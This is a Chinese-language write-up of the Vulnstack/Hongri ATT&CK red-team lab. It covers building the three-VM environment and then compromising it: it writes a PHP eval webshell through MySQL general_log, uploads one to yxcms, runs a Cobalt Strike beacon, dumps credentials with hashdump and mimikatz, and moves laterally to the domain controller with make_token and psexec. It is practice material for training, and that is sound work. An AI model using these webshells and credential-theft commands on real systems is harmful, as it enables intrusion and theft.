一.介绍
vulnstack官网下载地址,也是拿百度网盘下载的,这里也放一个链接提取码: i7xv
官方靶机说明:
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟 ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实 APT 实战环境,从实战中成长。虚拟机所有统一密码:hongrisec@2019
整体思路
信息收集发现yxcms框架的网页,通过漏洞利用get到shell,拿cs控制后进行内网信息收集以及横向移动,最终用窃取的凭证横向移动到其他主机,最终实现整个域的控制。可能因为是第一个靶机,没有什么防护(好吧,因为配置的原因我还把防护墙都关了),所以一套流程操作就能拿下,但是中间碰到的问题还是挺多的,有些还是值得思考的。这个靶机的web漏洞利用、内网信息收集、横向移动还有特别多的点都没有涉及到,先丢到这,等总结完每部分以后再进行补充。
二.环境搭建
下载下来是三个压缩包
VM1为win7,VM2为winserver 2003即win2k3,VM3为winserver 2008,分别解压出来,这里可以了解一下VMWare 文件格式详解 .VMX .VMSD .VMDK,这里我们直接打开三个虚拟机
拓扑图为下图所示:
如图我们可以看出VM1是通外网的Web服务器,VM2和VM3是内网环境,与外网隔绝,我们只可以通过VM1进行访问。所以要搞一个与外网隔绝的内网环境(包括VM1,VM2,VM3),在VMware中通过虚拟机设置里的网络适配器来完成设置(仅主机模式并放到一个VMnet中)。其次要使得VM1能够访问外网,所以需要给VM1添加一个网卡,设置成NAT模式。 VMware网络连接模式——桥接模式、NAT模式以及仅主机模式的介绍和区别
所以网络设置如下
- VM1(win7)
- VM2(winserver2k3)和VM3(winserver2008)
配置完成后开机提示按Ctrl+Alt+Del键(刚开始一直按的删除键backspace没反应,尬住了),开机初始密码都是hongrisec@2019,如果需要修改密码修改就是了(2018的应该要求必须改,我这里将2019改成2021),打开win7的界面如下,
首先启动phpstudy(报错就重启)
三.渗透测试
拿下web服务器
信息收集
上去还是扫同段主机arp-scan -l
进行端口扫描nmap -sV -p 1-65000 192.168.22.129
如果这一步没反应或者没数据,尝试ping一下win7,ping不通的话关掉win7的防火墙才行。
发现了80端口,本机访问发现了phpstudy探针
进行目录扫描,拿出我珍藏版的御剑,发现beifen.rar和phpmyadmin后台
下载备份rar发现该网站是yxcms
访问/yxcms/,发现有后台登陆密码,在指定目录登录
因为也扫到了phpmyadmin,这里先访问,发现弱口令root/root也登录上去了
漏洞利用
mysql写入shell
首先是在phpmyadmin页面中,既然已经有了管理员身份能够执行sql命令,那就直接写入webshell就好了。写入mysql_通过MySQL写入webshell的几种方式,这里通过show variables like '%secure_file%';
发现secure_file_priv = NULL
这里倒是可以通过命令来开启慢查询(上面参考的这篇文章里也有写),不过这里选择使用日志写入shell(其实这里日志服务也没开,得先开一下,这里一开始没看见。。。。。)
指定日志文件
set global general_log_file = "C:/phpStudy/www/1.php";
将一句话木马写入指定的文件中
SELECT '<?php eval($_POST["cmd"]);?>'
擦试了几下都不行,一看日志服务都还关着呢
set global general_log = "ON"; 开启日志服务
成功写入,通过蚁剑连接
yxcms文件上传
其实在这个yxcms中漏洞更多,首先是后台的一个文件上传
直接新建一个一句话木马文件,他也有提示当前位置是在default文件下,我们通过刚开始的beifen.rar可以找到目录
yxcms/protected/apps/default/view/default/1.php
因为是yxcms框架,其实还有sql注入,xss,任意文件删除,具体漏洞分析查看代码审计| yxcms app 1.4.6 漏洞集合
内网渗透
上线cs
这里我就拿kali作为服务端,拿我本机作为客户端。
先创建监听器
生成后门
通过蚁剑把exe文件扔上去,通过命令行执行,成功上线
这里可以先把回连间隔调小一些(打靶机的话直接0就好了)
主机及域内信息收集
渗透测试信息收集,可以看一下我写的这一篇文章。其实信息收集下面这一部分写的比较草,因为遇到了环境搭建的问题,并且我对这块并没有一个明确的思路,虽然说这里信息收集并没有占到很大的用处,但其实在实际渗透中,信息收集也是渗透测试的灵魂。
判断是否存在域
使用 ipconfig /all 查看 DNS 服务器(这里首先是对机器的信息收集,查型号,ip,系统等等等等,这里只写了ipconfig):
shell ipconfig /all
查看是否有域,以及当前域(对域的信息收集):
net config workstation
这里其实出现了问题
/domain是在计算机主域的主域控制器中执行操作,如果不加这个参数的话,所有命令倒是都能正常执行。
获取域内用户的详细信息:
wmic useraccount get /all
横向探测
图形化界面进行探测或者net view :
点击这个查看扫描出来的主机(环境问题还是挺多的,抱着能跑就行的心态来搞渗透测试)
用 cs 的 hashdump 读内存密码(或者如下图形化操作):
hashdump
用 mimikatz 读注册表密码:
logonpasswords
在密码凭证视图里看整合的信息
这里也是可以直接使用工具进行提权
横向移动
smb
SMB Beacon 使用命名管道通过父级 Beacon 进行通讯,当两个 Beacons 链接后,子 Beacon 从父 Beacon
获取到任务并发送。因为链接的 Beacons 使用 Windows 命名管道进行通信,此流量封装在 SMB 协议中,所以 SMB
Beacon 相对隐蔽,绕防火墙时可能发挥奇效
psexec 使用凭证登录其他主机
因为get到密码凭证并提权到了system,所以可以利用(这里其实有问题,因为之前改过一次密码,这里的密码已经不是hongrisec@2019而是hongrisec@2021,所以这里报错了很长时间,下图还是截的2019的图,其实是换成2021才运行的)
一共执行了三个命令
beacon> rev2self
[*] Tasked beacon to revert token
beacon> make_token GOD.ORG\Administrator hongrisec@2021
[*] Tasked beacon to create a token for GOD.ORG\Administrator
beacon> jump psexec ROOT-TVI862UBEH smb
同样的方法把域控拿下
最终的一个图形会话
token窃取
文章来源:https://www.toymoban.com/news/detail-486309.html
参考[VulnStack] ATT&CK实战系列—红队实战(一)
参考红日安全vulnstack-ATT&CK实战系列 红队实战(一)
参考ATT&CK 实战 - 红日安全 vulnstack (一)
还有就是文章中的链接。文章来源地址https://www.toymoban.com/news/detail-486309.html
到了这里,关于红日安全vulnstack-ATT&CK实战系列 红队实战(一)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!